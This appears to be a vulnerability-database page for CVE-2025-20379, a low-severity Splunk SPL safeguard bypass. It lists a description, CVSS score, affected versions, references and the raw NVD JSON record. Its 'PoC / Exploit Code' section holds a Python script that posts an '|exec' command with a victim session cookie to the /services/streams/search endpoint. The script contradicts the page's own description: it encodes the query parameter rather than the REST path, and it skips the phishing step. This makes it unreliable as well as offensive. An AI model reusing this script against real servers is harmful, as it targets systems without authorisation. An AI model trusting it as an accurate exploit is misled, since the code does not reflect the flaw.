CVE-2025-20379

Description

In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, and 9.2.9 and Splunk Cloud Platform versions below 9.3.2411.116, 9.3.2408.124, 10.0.2503.5 and 10.1.2507.1, a low-privileged user that does not hold the “admin“ or “power“ Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands. They could bypass these safeguards on the “/services/streams/search“ endpoint through its “q“ parameter by circumventing endpoint restrictions using character encoding in the REST path. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - VULNERABLE

Splunk Enterprise < 10.0.1

Splunk Enterprise < 9.4.5

Splunk Enterprise < 9.3.7

Splunk Enterprise < 9.2.9

Splunk Cloud Platform < 9.3.2411.116

Splunk Cloud Platform < 9.3.2408.124

Splunk Cloud Platform < 10.0.2503.5

Splunk Cloud Platform < 10.1.2507.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-20379 PoC - SPL Safeguard Bypass
# Target: Splunk Enterprise < 10.0.1, 9.4.5, 9.3.7, 9.2.9
# Endpoint: /services/streams/search

import requests
import urllib.parse

TARGET = "https://vulnerable-splunk.example.com"
SESSION_COOKIE = "your_session_cookie"

def encode_payload(payload):
    # URL encode special characters to bypass path validation
    encoded = payload.replace("/", "%2F")
    encoded = encoded.replace(" ", "%20")
    return encoded

def exploit():
    headers = {
        "Cookie": f"splunkd_session={SESSION_COOKIE}",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Malicious SPL command to bypass safeguards
    spl_command = "|exec"  # Dangerous command normally blocked
    
    # Encode the SPL command in the q parameter
    endpoint = f"{TARGET}/services/streams/search"
    
    # Method 1: Direct encoded payload
    data = {
        "q": encode_payload(spl_command)
    }
    
    response = requests.post(endpoint, headers=headers, data=data)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")

if __name__ == "__main__":
    print("CVE-2025-20379 Splunk SPL Bypass PoC")
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-20379
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-20379
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-20379/
[4] VulDB https://vuldb.com/cve/CVE-2025-20379
[5] https://advisory.splunk.com/advisories/SVD-2025-1102

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-20379", "sourceIdentifier": "[email protected]", "published": "2025-11-12T18:15:35.030", "lastModified": "2025-12-03T21:41:26.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, and 9.2.9 and Splunk Cloud Platform versions below 9.3.2411.116, 9.3.2408.124, 10.0.2503.5 and 10.1.2507.1, a low-privileged user that does not hold the “admin“ or “power“ Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands. They could bypass these safeguards on the “/services/streams/search“ endpoint through its “q“ parameter by circumventing endpoint restrictions using character encoding in the REST path. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.9", "matchCriteriaId": "FE00218E-F8B2-42DA-9E4E-D7A00B657B93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.7", "matchCriteriaId": "C6257ADA-AB6E-4679-A41B-BCE79CE8D573"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.5", "matchCriteriaId": "30970DF3-6DA7-4FAB-B234-3226F47F9C87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:10.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "259A3F4B-E4D2-48BC-9AE9-C37DE94987D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2408", "versionEndExcluding": "9.3.2408.124", "matchCriteriaId": "C534EB53-D57A-4FB6-AC59-BDBFC451D892"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.116", "matchCriteriaId": "CF33BD17-3D4D-47CC-A917-13AD9C777A47"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.5", "matchCriteriaId": "E82D5593-83EE-4B20-ABDD-937AD94D6DB1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.1", "matchCriteriaId": "53675B00-D339-426F-AB65-AF70A983433D"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1102", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}